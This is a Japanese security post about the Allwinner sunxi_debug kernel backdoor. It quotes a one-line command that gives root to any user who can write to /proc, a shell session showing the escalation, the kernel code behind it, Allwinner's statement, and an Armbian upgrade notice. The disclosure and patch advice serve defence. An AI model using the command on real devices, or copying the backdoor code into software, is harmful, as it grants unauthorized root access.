このバックドアがあると、どのプロセスでも、どのUIDでも/proc
にアクセス権さえあればecho "rootmydevice" > /proc/sunxi_debug/sunxi_debug
というコマンドを実行することで、rootユーザーになれるようです。つまりネットワーク上に公開しているサービスで条件を満たしていれば、リモートからrootでコマンドを実行できる可能性があるということにもなります。確認方法はこちら(以下抜粋):
tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
tk@bananapim3:~$ id
uid=0(root) gid=0(root) groups=0(root),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev),1000(tk)
問題のコードはこちら(以下抜粋):
if(!strncmp("rootmydevice",(char*)buf,12)){
cred = (struct cred *)__task_cred(current);
cred->uid = 0;
cred->gid = 0;
cred->suid = 0;
cred->euid = 0;
cred->euid = 0;
cred->egid = 0;
cred->fsuid = 0;
cred->fsgid = 0;
printk("now you are root\n");
}
このコードを作ったAllwinnerのコメントはこちら(以下抜粋):
Allwinner Technology committed to resolving Linux Kernel software issue
Zhuhai, China - Allwinner Technology.Co.Ltd (SHE: CN:300458) is working with its device manufacturers to fix a current software issue. We are aware that code, which was supplied to device manufacturers for the purpose of developing products, should have been removed prior to shipping. We recommend that anyone who is concerned about this issue should contact the relevant device manufacturer.
In relation to the source code on Github, it is released for the open source community only and not for shipping certain devices. Since a debugging function is not needed it has subsequently been removed.
Allwinner is committed to producing quality SoC’s with security a key priority. We are currently working hard to address this issue and revising our current processes so we can continue to evolve our range of SoC’s in the future.
apt-get update/upgradeで対応できるとのことなので、対応が必要な方はお早めに。
the fix is also in Armbian's apt repo so please upgrade now (apt-get update/upgrade or start with a fresh OS image) if you're affected!
-- Armbian - Security Alert for Allwinner sun8i (H3/A83T/H8)より